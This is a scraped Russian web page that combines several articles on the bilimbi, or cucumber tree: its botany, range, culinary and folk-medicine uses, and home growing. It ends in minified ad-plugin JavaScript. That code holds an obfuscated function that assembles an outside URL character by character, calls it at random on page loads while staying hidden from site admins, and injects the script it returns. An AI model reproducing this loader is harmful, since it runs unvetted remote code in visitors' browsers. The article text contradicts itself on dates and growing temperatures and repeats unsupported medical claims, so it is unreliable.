9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огуречное дерево билимби описание фото

Огуречное дерево — описание, виды, особенности ухода и выращивания

Что такое огурец, с чем и как его едят — знает каждый из нас. Знаем мы и как растёт огурец — травянистое растение, являющееся самой древней овощной культурой. А вот жители Индонезии могут с уверенностью сказать — он растет не только на кустарниках. Огуречное дерево, которое ещё называют билимби, — самое обычное растение для индонезийцев. Чем же плоды этого дерева похожи или отличительны от привычной нам овощной культуры, узнаем из этой статьи.

Огуречное дерево билимби

Дерево билимби относится к семейству Кисличных (также существует несколько неродственных видов, несущих название огуречного дерева — дендросициос и магнолия). В высоту оно может достигать более 9 метров — начиная с одного метра от земли ствол разветвляется. Крона дерева широкая и очень богатая. Листья напоминают листву акации — такие же перистые и красивые.

Цветки дерева во время цветения выгодно отличаются на фоне зелени — ярко-красные, они раскрывают по 5 лепестков, становясь похожими на звёзды. К тому же цветки испускают тонкий аромат, на который всегда собирается много различных опылителей. Интересно, что цветы распускаются не на ветвях дерева, а прямо на стволе — там же появляются и огуречные плоды. Они на самом деле напоминают обычные огурцы, только отличаются размером — чуть больше в длине (от среднего огуречного плода) и в диаметре. Итак, мы в общем узнали, что такое огуречное дерево.

Плоды с кислинкой

Плоды билимби хорошо заметны среди листвы. Поодиночке листочки имеют бледно-зелёную окраску, но, собираясь в один сложный лист, оттеняют друг друга тёмно-зелёным тоном. Уникальное качество этого дерева — способность удерживать влагу в тканях ствола, что помогает растению благополучно пережить самые засушливые времена. К тому же удерживаемая влага положительно сказывается на обилии млечного сока, который применяется в хозяйственных целях. Плоды огуречного дерева растут гроздьями — как бананы, хотя с виду больше похожи на небольшие кабачки.

Максимальная длина плода может составлять не больше 10 сантиметров. Если попробовать его на вкус, то первое, что почувствуется — кислота, сравнимая по вкусовым качествам с лимонной или лаймовой. А вот семечки в плодах встречаются очень редко — из целой плодовой грозди с семечками попадётся от силы один-два плода.

Немного интересных фактов о билимби

Выше мы узнали, где растёт огуречное дерево, однако встретить его можно не только в Индонезии, но и в Индии, Бразилии, Колумбии. Билимби широко применяется в фермерских хозяйствах. Благодаря уникальной способности долго удерживать влагу, ткани дерева наполняются тягучим млечным соком, который сильно размягчает мякоть древесины. В особо засушливый период фермеры кормят скот сочной мякотью, что позволяет благополучно пережить трудные времена. Ещё одно необыкновенное свойство, которым обладает огуречное дерево — его листья. А точнее — их способность закрываться на ночь, опять же сохраняя свою внутреннюю влагу и позволяя плодам наслаждаться ночным ветром и иногда проходящим дождём. Раскрывается листва с первыми лучами солнца, сохраняя плоды от излишнего солнечного света.

Применение плодов билимби

Несмотря на то что мякоть плодов билимби сочная и хрустящая, в свежем виде в пищу их практически не используют из-за повышенной кислотности. Зато как приправа они подходят практически к любому блюду. Их щедро добавляют при готовке риса, мяса, рыбы, бобов, идеальными получаются маринады и даже прохладительные напитки.

Очень вкусным получается желе, только предварительно плоды надо проколоть в нескольких местах и дать полежать в сильно солёной воде, чтобы устранить лишнюю кислотность. Известно билимби (огуречное дерево) и как идеальный поставщик цукатов. Его огуречные плоды предварительно засахариваются и высушиваются, превращаясь во вкусное сладко-кислое лакомство. Причём есть цукаты можно как в составе блюд, так и отдельно. Большое значение имеет местность, где растёт огуречное дерево (виды деревьев напрямую связаны с вкусовыми качествами плода). Например, есть такие, чей вкус напоминает смесь яблока и сливы, а есть сорта, отдающие сладостью винограда. Однако не только плоды широко применимы в повседневной жизни. Благодаря высокому содержанию щавелевой кислоты, плоды используются и для хозяйственных нужд.

Что делают с плодами в хозяйстве

Огуречное дерево, а точнее его производные, широко применяют в домашнем хозяйстве. Из тропических плодов приготавливают специальные средства, с помощью которых впоследствии отбеливают ткани, очищают грязные поверхности либо натирают латунные и серебряные изделия, которые после становятся совсем как новые, возвращая свой первоначальный блеск. В парфюмерии плоды билимби используются как очиститель кожи — их сок добавляют при изготовлении мыла.

А вот для медиков огуречное дерево — кладезь полезных ингредиентов. Листья билимби помогают очистить рану от яда — стоит их только приложить к укушенному месту. Отвар листьев или коры — идеальное средство от кашля, болей в суставах и ревматизма. В медицине используются даже цветы растения — они являются отличным средством от диареи. Многие африканские племена считают дерево билимби священным, а на плодах проводятся самые важные для аборигенов обряды.

Билимби как домашнее растение

Как бы странно это ни звучало, но огуречное дерево можно вырастить дома. Главное, что надо знать — дерево можно прорастить из семечка, но только свежего, извлечённого сразу после сбора плода. Очень важно, чтобы грунт был достаточно увлажнён и удобрен. Будет неплохо, если смешать его с речным песком. Семя проращивают в контейнере — ростку надо будет много тепла и солнца. Потом пересаживают в горшок.

Очень важен обильный полив и прогретый воздух (не менее 20 градусов). Билимби надо подкармливать минеральными удобрениями, а также постоянно опрыскивать. Зимой землю стоит поливать чуть меньше, но с постоянством, чтобы не было засушливости. Подкормка прекращается с наступлением холодов. Весна — это время обрезки. С билимби осторожно удаляются засохшие ветви, а также тщательно рядится крона, чтобы молодые листочки могли дышать в полную силу. Цветёт билимби и дома, но всё же рекомендовано в летний период пересаживать деревце в сад.

Огуречное дерево Билимби

Огуречное дерево — редкая, но легкая в выращивании экзотическая культура. Другое ее название — щавелевое дерево, или Аверхоа билимби, семейство Кисличные. Близкий родственник растения — Аверхоакарамбола.

Огуречное дерево Билимби

Распространение

Регион естественного произрастания — тропики и субтропики. Вид популярен и широко распространен в Индии, Тайланде, Сингапуре, Индонезии, Малайзии, на Занзибаре.

В 1793 году Аверхоа билимби впервые был завезен на Ямайку из Тимора и Молуккских островов, которые считаются его родиной, далее в течение нескольких лет он был ввезен в Центральную и Южную Америку под названием Мимбро. В конце XIX века в Квинсленде началось коммерческое выращивание. Сегодня плантации огуречного дерева есть на Кубе, в Пуэрто-Рико, Венесуэле, Тринидаде, Колумбии, Эквадоре, Аргентине, Никарагуа, Гайане, Суринаме, на Гавайях и в Южной Флориде.

Характеристика растения

Внешний вид и строение

Это широколиственное листопадное дерево. В субтропиках высота огуречного дерева обычно не превышает 10-15 м, в тропиках достигает 35 м. В теплице высота растения — в среднем 4-5 м.

Мелкие, ароматные, душистые желтовато-зеленые или пурпурные с темно-фиолетовыми отметинами цветки собраны в небольшие соцветия-метелки. Цветоносы вырастают прямо из ствола. Цветок состоит из 5 лепестков.

Листья сложные, 30-60 см длиной, образованы 11-37 супротивными листочками по 2-10 см длиной каждый.

Плоды ребристые, 5-8 см в длину, по форме напоминают огурцы, собраны в кисти, как у банана. Мякоть очень кислая, желеобразная, с мелкими семенами, в недозрелом виде хрустящая, ярко-зеленая, при созревании желтеет. Кожура глянцевая, очень тонкая и нежная.

Внутри каждого плода располагаются 6-7 округлых плоских коричневых семян диаметром около 6 мм.

Особенности произрастания

Молодые сеянцы чувствительны к холоду и ветру, температура для выращивания должна быть не ниже 30°C. Подросшие экземпляры со временем становятся более выносливыми.

Огуречное дерево хорошо растет на богатых дренированных почвах в районах с регулярными дождями в течение года, поэтому в местах с сезонными осадками почти не встречается.

Размножение происходит преимущественно семенами, однако, Вестер успешно размножал саженцы воздушными отводками длиной 3.8-5 см.

Срок хранения урожая огуречного дерева не превышает 5 дней.

Применение в кулинарии

Сорт нашел применение в кухнях разных стран:

  • В Коста-Рике популярен соус, приготовленный из свежего фрукта в качестве приправы к рису и фасоли, а иногда к рыбе и мясу.
  • В Индии зрелые фрукты добавляют в карри вместо манго при приготовлении чатни, часто смешивают со сладким тамариндом. В регионах Керала и Гоа из мякоти с добавлением соли и специй делают соус к рыбе.
  • В Индонезии Билимби употребляют вяленым, такой десерт называется Асам сунти.
  • В Малайзии традиционно готовят сладкий джем.
  • На Сейшелах варят соус, подаваемый к акульему мясу.

Из плодов делают лимонад

Билимби содержит большое количество витамина C, свежий сок используют для приготовления лимонада. Для уменьшения кислоты перед готовкой плоды на ночь замачивают в воде, а затем варят с сахаром. В зависимости от пропорции получается варенье или желе.

Из цветков с сахаром готовят цукаты. Наполовину созревшие экзотические огурцы солят и маринуют. Готовый продукт хранится 3 месяца. Быструю засолку проводят в кипящем рассоле.

Применение в традиционной медицине

  • Филиппинцы применяют пасту из листьев Билимби от зуда, отеков, кожных высыпаний, при ревматизме.
  • Индийцы — от укусов ядовитых насекомых. Настой из листьев пьют как тонизирующее средство. Отвар из цветов эффективен при молочнице и воспалении горла.
  • Малазийцы сок растения используют в качестве глазных капель.

Препараты из растительного сырья в виде отваров, настоев, порошка или пасты раньше использовали в традиционной медицине для профилактики и лечения цинги, воспаления прямой кишки, ожирения и дерматозов.

Сок, содержащий большое количество щавелевой кислоты, хорошо отбеливает ткани, очищает пятна ржавчины.

В мякоти содержится ряд полезных веществ:

  • щавелевая кислота,
  • витамин C,
  • углеводы,
  • белки,
  • аминокислоты,
  • дубильные вещества,
  • эфирные масла,
  • флавоноиды.

В листьях обнаружены:

  • дубильные вещества,
  • алкалоиды,
  • флавоноиды,
  • сапонины,
  • сердечные гликозиды,
  • углеводы,
  • фенолы.

Щавелевая кислота стимулирует работу мышц и нервной системы, обладает бактерицидными свойствами. В больших количествах может вызвать развитие мочекаменной болезни.

Дубильные вещества — это природные сорбенты, выводящие из организма канцерогенные вещества.

Эфирные масла восстанавливают водно-солевой баланс, обеспечивают организм полезными минералами и витаминами.

Флавоноиды влияют на работу ферментов в нервной и кровеносной системах.

Сапонины используют при приготовлении тонизирующих, отхаркивающих и седативных лекарственных препаратов.

Сердечные гликозиды поддерживают нормальную работу сердца.

Фенолы оказывают дезинфицирующее действие на дыхательные пути и моче-половую систему.

Алкалоиды оказывают тонизирующее и обезболивающее воздействие, положительно влияют на нервную систему.

Институтом Никарагуа научно доказано противомикробное эффективное действие экстракта листьев на опасные бактерии Bacillus cereus, Bacillus megaterium, Escherichia coli, Pseudomonas aeruginosa, Aspergillus ochraceous и Cryptococcus neoformans.

Билимби — огуречное дерево

А слышали вы когда- нибудь об огуречном дереве? Не многие огородники знают о таком чуде природы, которое плодоносит огурцами. Я расскажу вам об этом волшебном растении, которое называется билимби.

Огуречное дерево произрастает в теплых странах. В культуре выращивается для получения плодов напоминающих огурцы, которые также как их сородичей по грядке можно солить или консервировать. Родиной билимби считается Малайзия, в настоящее время широкое промышленное распространение это дерево получило в Таиланде, Индии, Бразилии, странах Центральной Америки.

Ботаническое описание

Билимби – огромное красивое листопадное дерево, представитель рода Аверройя. В высоту конусообразный ствол дерева может достигать до 9 м, однако в искусственных условиях дерево не превышает 4-5 метров. Ствол мощный, разветвляется на несколько веток в вертикальном расположении, покрытых серо-коричневой корой и небольшими шипами. Своей привлекательностью это дерево обязано расположению листьев и их свойствам. С наступлением ночи листья огуречного дерева сворачиваются, создавая завораживающий вид спящего растения. Листья имеют достаточно сложную форму и состоят из овальных, покрытых пушком маленьких листиков, идущих ровно в ряд и опущенных вниз. Один полноценный лист достигает в длину до 60 см, листья расположены друг за другом, полностью покрывая ветви, что придает дереву декоративный вид. Если сезон засушливый, огуречное дерево способно сбросить листья, чтобы уменьшить испарение влаги.

Цветение билимби характеризуется приятным ароматом. Цветы темно-красного или желтовато-зеленого цвета собраны в соцветия – метелки, которые растут непосредственно на стволах или ветвях дерева. После цветения формируются эллиптические ребристые плоды, которые, в свою очередь, собираются в гроздья. Недозрелые плоды очень похожи на небольшие огурчики ярко-зеленого цвета, длиной 5-10 см. Мякоть незрелых плодов хрустящая, при созревании она становится сочной и кислой. Кожура зрелых «огурцов» варьируется от желто-зеленого до белого цвета. У некоторых сортов плоды содержат коричневые круглые семена около 6 мм шириной.

Выращивание билимби дома

Коллекции цветоводов, любителей экзотических растений, обязательно должны пополниться миниатюрным огуречным деревом. В домашних условиях это растение размножается свежими семенами, которые высаживают в питательный, влажный субстрат. Хотя в диких условиях билимби прекрасно себя чувствует на бедных почвах и в засушливом климате, тем не менее в условиях квартиры нужно обеспечить ему слабокислую земляную смесь, хорошо удерживающую влагу. Для этого нужны в одинаковых частях торф, дерновая земля и немного речного песка. Емкость с семенами помещается в теплое, светлое место. В период роста и вегетации необходимо увлажнять грунт, регулярным и обильным поливом. Не забывайте периодически опрыскивать деревце водой комнатной температуры.

Билимби способно, как и суккуленты накапливать воду в тканях, именно благодаря этому растение с легкостью переносит засуху и летний зной. В зимний период для оптимального роста дерева достаточно температуры от 18 — 20 градусов. Во время цветения и плодоношения желательно подкормить огуречное дерево комплексом минеральных удобрений, растворенных в теплой воде. Весной нужно обязательно проводить санитарную обрезку, одновременно придавая растению декоративную форму. При обрезке удаляйте сухие ветки, листья, прореживайте крону. В летний сезон переносите контейнер с огуречным деревом на балкон или в сад.

Применение плодов и листьев билимби

Плоды огуречного дерева обладают уникальным составом витаминов и минералов. Обычно в свежем виде плоды не употребляют из – за кислого вкуса. Но именно эта вкусовая специфика позволяет использовать билимби в различных блюдах в качестве приправ. С вареным мясом, рыбой, фасолью, рисом употребляют недозрелые плоды билимби. Кроме того, плоды сушат, консервируют. Созревшие плоды подходят для приготовления напитков, варки желе. Сок билимби можно использовать как отбеливатель из-за большого содержания щавелевой кислоты.

Плоды огуречного дерева прекрасно себя зарекомендовали в народной медицине, листья используют при венерических заболеваниях, кожных сыпях, опухолях, ревматизме и укусах змей, насекомых. Отвар билимби содержит витамины, аскорбиновую кислоту, рибофлавин, его используют как отхаркивающее средство. А настой из цветков применяют при диарее.

Огуречное дерево Билимби

Ботаническое название: билимби.

Родина билимби: Малайзия.

Освещение: светолюбив.

Почва: каменистая.

Полив: засухоустойчив.

Максимальная высота дерева: 10 м.

Средняя продолжительность жизни дерева: 50-70 лет.

Посадка: семенами.

Описание огуречного дерева Билимби с фото

Билимби (лат. Averrhoa bilimbi) или огуречное дерево – растение семейства Кисличные, вид рода Averrhoa.

Ствол дерева билимби мощный, короткий, на расстоянии метра от земли он разветвляется на несколько вертикальных ветвей, покрытых длинными (до 60 см), сложными листьями. Каждый лист состоит из 11-37 овально-продолговатых, расположенных друг против друга мини-листиков (2-5 см в длину и до 1,25 в ширину), направленных вниз. Каждый из них имеет бледно-зелёную окраску, но в целом сложный лист выглядит темно-зеленым из-за плотного прилегания его составляющих. Деревья билимби обладают способностью накапливать влагу в тканях ствола, что позволяет им пережить длительную засуху.

Цветки дерева билимби состоят из пяти лепестков багряного или желтовато-зелёного цвета, обладают приятным ароматом.

Как видно на фото огуречного дерева, все цветы собраны в метёлки, растут на самых старых, толстых ветвях или прямо на стволе.

Особую ценность представляют плоды билимби. Они растут гроздьями, имеют эллиптическую, слегка ребристую форму. Плоды достигают до 4-10 см в длину и прикрыт у основания маленькой звёздообразной чашечкой. На конце каждой чашечки длительное время сохраняются цветочные остатки. Плоды билимби кислые, в некоторых содержатся дискообразные семена до 6 мм в ширину.

Часть плодов – бессемянные. В недозрелом состоянии они имеют ярко-зелёную окраску и хрустящую мякоть. Созревая, становятся жёлто-зелёными, затем приобретают оттенок слоновой кости, перезревшие плоды – почти белые. Мякоть при созревании плодов становится мягкой, желеобразной и очень сочной, а кожура истончается, поэтому нужно быть очень осторожным при сборе урожая и его транспортировке.

Родиной огуречного дерева считается Малайзия. Кислые тропические плоды пришлись по душе жителям многих стран, и теперь билимби широко культивируется в Таиланде, Индонезии, Мьянме, Танзании, Индии, на Шри-Ланке и Филиппинах. В конце XVIII века культивары огуречного дерева были завезёны на Ямайку и в скором времени получили распространение на все Антильских островах, а также в Венесуэле, Бразилии, Колумбии, Аргентине, Эквадоре и странах Центральной Америки.

Применение кислого плода тропического дерева билимби

Кислые плоды билимби редко используются в пищу в свежем виде – в основном, их добавляют в блюда при приготовлении бобов, риса, мяса или рыбы, применяют для изготовления маринадов и прохладительных напитков. Также из кислых тропических плодов варят варенье и желе, причем предварительно делают прокол и вымачивают в соленой воде, чтобы уменьшить кислотность. В Индонезии их засахаривают и сушат, получая на выходе цукаты. Идут в пищу и цветки билимби, которые консервируют с сахаром. Плоды некоторых культиваров по вкусу напоминают смесь сливы, яблока и винограда, есть сорта билимби со вкусом крыжовника, выведены и сладкие формы огуречного дерева, однако в тропических странах все равно предпочитают употреблять в пищу лишь классические, кислые плоды.

В соке билимби очень высокая концентрация щавелевой кислоты, поэтому специальные средства, изготовленные на основе этих тропических плодов, применяют для очистки поверхностей, отбеливания белых тканей, придания яркости латунным и серебряным изделиям. Мыло с добавлением сока билимби очень хорошо отмывает кожу рук.

Широко используются различные части дерева билимби и в медицинских целях. Листья прикладывают на места укусов ядовитыми животными, применяют при ревматизме, болях в суставах и кожных высыпаниях. Отвар коры и листьев употребляется в качестве отхаркивающего и противовоспалительного средства. Настой цветков используется как средство от диареи.

В некоторых африканских племенах деревья билимби считаются священным, около них часто проводятся местные обряды.

Посадка дерева билимби в домашних условиях

Растения билимби нередко встречаются в домашних коллекциях любителей экзотических растений. Размножаются эти деревца только свежими семенами, сразу после их сбора.

Семена высаживают во влажный, плодородный субстрат (торф и перлит в одинаковых частях плюс небольшое количество речного песка).

Контейнер с семенами необходимо поместить в теплое, светлое помещение, не забывая о регулярном увлажнении грунта. Появившиеся ростки пересаживают в горшки, заполненные смесью дерновой земли, листового перегноя и речного песка в равных долях. Весь период доращивания растения требуют обильного полива и поддержания комнатной температуры на уровне 20°С. Пересадка производится не реже одного раза в три года.

Во время вегетации необходимо не допускать пеересушивания почвы, на зиму полив следует сократить, однако почва все равно должна оставаться влажной. Как и всем тропическим растениям, билимби полезно опрыскивание. В качестве подкормки используются комплексные минеральные удобрения, растворенные в теплой воде. С наступлением холодов подкормку нужно прекратить.

Весной необходимо провести санитарную обрезку: удалить засохшие листья и ветви, проредить крону для обеспечения свободной циркуляции воздуха. В домашних условиях билимби зацветает весной, но иногда растение может цвести несколько раз в течение всего вегетационного периода. На лето деревца лучше переместить на балкон или в сад.

Огуречное дерево, или билимби

24.07.2019

Огуречное дерево, или билимби (лат. Averrhoa bilimbi) относится к семейству Кисличные (Oxalidaceae) из порядка Кисличноцветные (Oxalidales). Оно широко культивируется в странах с тропическим и субтропическим климатом ради получения кислых и богатых витаминами плодов, которые внешне напоминают более привычные для жителей умеренного пояса огурцы.

Растение является ближайшим родственником карамболы (Averrhoa carambola), но хуже нее переносит даже кратковременное похолодание. В его плодах содержится много щавелевой кислоты, поэтому выдавленный из них сок в Азии используется в технических целях. С его помощью удаляют ржавчину с металлических предметов, а малайцы традиционно чистят им лезвия крисов, своих национальных кинжалов.

Вид был впервые описан в 1753 году шведским натуралистом Карлом Линнеем в книге Species Plantarum.

Распространение

Прародиной огуречного дерева считаются Молуккские острова в Индонезии. С XVII века его стали выращивать в Малайзии, Мьянме, на Шри-Ланке, Мальдивских островах и Филиппинах. Растение распространено в Бангладеш и прибрежных районах на юге Индии. Кроме Азии его большие плантации имеются на Занзибаре.

В 1973 году билимби впервые завезли на Ямайку и Тимор. Спустя несколько лет огуречное дерево распространилось по странам Центральной и Южной Америки. В Австралию оно попало в конце XIX века.

Под открытым небом растение хорошо растет и плодоносит только в тропиках, где выпадает много осадков и каждый год на протяжении 2-3 месяцев бывает сухой сезон. По этой причине его, например, не выращивают во влажных регионах Малайзии.

Использование в кулинарии

На Филиппинах плоды билимби едят сырыми или предварительно посыпают каменной солью. Они применяются для приготовления карри и добавляются в филиппинский суп синиганг. В Коста-Рике сырой билимби готовят как приправу с рисом и бобами. В Индонезии его сок добавляют в освежающие напитки и многие блюда вместо тамариндов и помидоров. В индонезийской провинции Ачех плоды сушат на солнце и используют для приготовления соусов.

В Малайзии фрукты засаливают в рассоле, снижая их кислотность, а цветы засахаривают в сахаре. Также из них часто делают варенье.

В Индии в штате Керала билимби идут на приготовление различных маринадов, а в штатах Карнатака, Махараштра и Гоа их съедают сырыми, посолив и посыпав специями. На Сейшельских островах их добавляют в рыбные блюда для придания им сильного аромата, характерного для креольской кухни.

В Никарагуа плоды огуречного дерева добавляются в салаты со свининой и маниоком.

Использование билимби в медицинских целях

Самое большое количество различных лекарств из этого растения делают на Филиппинах. Филиппинцы изготавливают различные мази, используемые для борьбы с зудом, отеками, ревматизмом, кожной сыпью и паротитом. Они также облегчают боль при укусах ядовитых насекомых и змей.

Настой из листьев является тонизирующим средством, а настой из цветков эффективен при простуде и кандидозе. Свежими листьями малайцы лечат венерические заболевания. Во Французской Гвиане экстракт из плодов применяется для лечения воспалений. В Индии они считаются эффективным средством для нормализации веса и борьбы с ожирением.

Описание

В естественных условиях огуречное дерево вырастает в высоту 5-10 м. Его ствол короткий и низко разветвляется на ветви. Крона шарообразная. Диаметр ствола 25-30 см.

Листья сложные, зеленые, перистые, длиной 30-60 см. Они состоят из листочков длиной 4-13 см. Они расположены на концах ветвей толщиной около 7 мм. Ветки покрыты густыми волосками коричневатого или желтоватого цвета.

Пятилепестковые цветки источают приятный аромат и собраны в метелки. Они бывают желтоватыми или багрянистыми с зеленоватым оттенком. Цветки располагаются на старых ветвях.

Плоды имеют эллиптическую форму с малозаметными 5 ребрами и длиной 5-10 см. По мере созревания они меняют цвет с зеленого до кремового или беловатого. Внутри них находится зеленоватая желеобразная мякоть с несколькими коричневыми семенами дискообразной формы и диаметром 5-6 мм.

Огуречное дерево необходимо содержать в просторном помещении с высокими потолками. В комнатных условиях оно может вырасти до 3 м в высоту. Его располагают в теплом месте без сквозняков, желательно возле окон с южной стороны. Растение нуждается в большом количестве солнечного света и высокой влажности. Ее поддерживают на уровне 70-80%.

Для билимби рекомендуется использовать субстрат из торфяной земли, компоста, песка и глины.

Необходимо следить, чтобы почва всегда была влажной, но не допускать ее переувлажнения. Поливают деревце каждый день. Воду для полива надо предварительно фильтровать и отстаивать в течение 2-3 суток. По возможности рекомендуется для полива брать дождевую воду.

Подкормка органическими и неорганическими удобрениями осуществляется один раз в две недели.

Пересаживают растение ранней весной, когда корни начинают появляться над поверхностью почвы. Перед пересадкой корневую систему обильно поливают.

Огуречное дерево цветет на 3-4 год после посадки. При отсутствии насекомых опыление необходимо делать вручную с помощью кисточки. Плоды созревают в сентябре или октябре.

Размножение

Билимби размножают семенами. Их извлекают из спелых плодов, избавляют от мякоти, промывают и слегка подсушивают. Семена нельзя долго хранить, так как они очень быстро теряют свою схожесть. Их высаживают в садовую землю с добавлением песка, слегка присыпав сверху грунтом.

Почву опрыскивают теплой водой из пульверизатора, посудину с посаженными семенами накрывают прозрачной пленкой и ставят в теплое и хорошо освещенное место. Температуру поддерживают в пределах 25°-28°С. Зимой нужен дополнительный обогрев.

Проращивание длится 2-3 недели. Сеянцы пересаживают в отдельные горшки, когда они подрастут до 15 см.

Их держат в тепле на светлых подоконниках. Нельзя допускать сквозняков и даже кратковременного похолодания. При температуре ниже 13°С ростки сбрасывают листья и могут погибнуть.

Весной в начале активной вегетации огуречное дерево можно размножить черенками. Их укореняют в горшках в смеси торфа и песка, взятых в пропорции 1:1. Сверху черенок накрывают стеклянной банкой и ставят в теплое место. После появления на нем 4-5 листочков его пересаживают в постоянный горшок.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
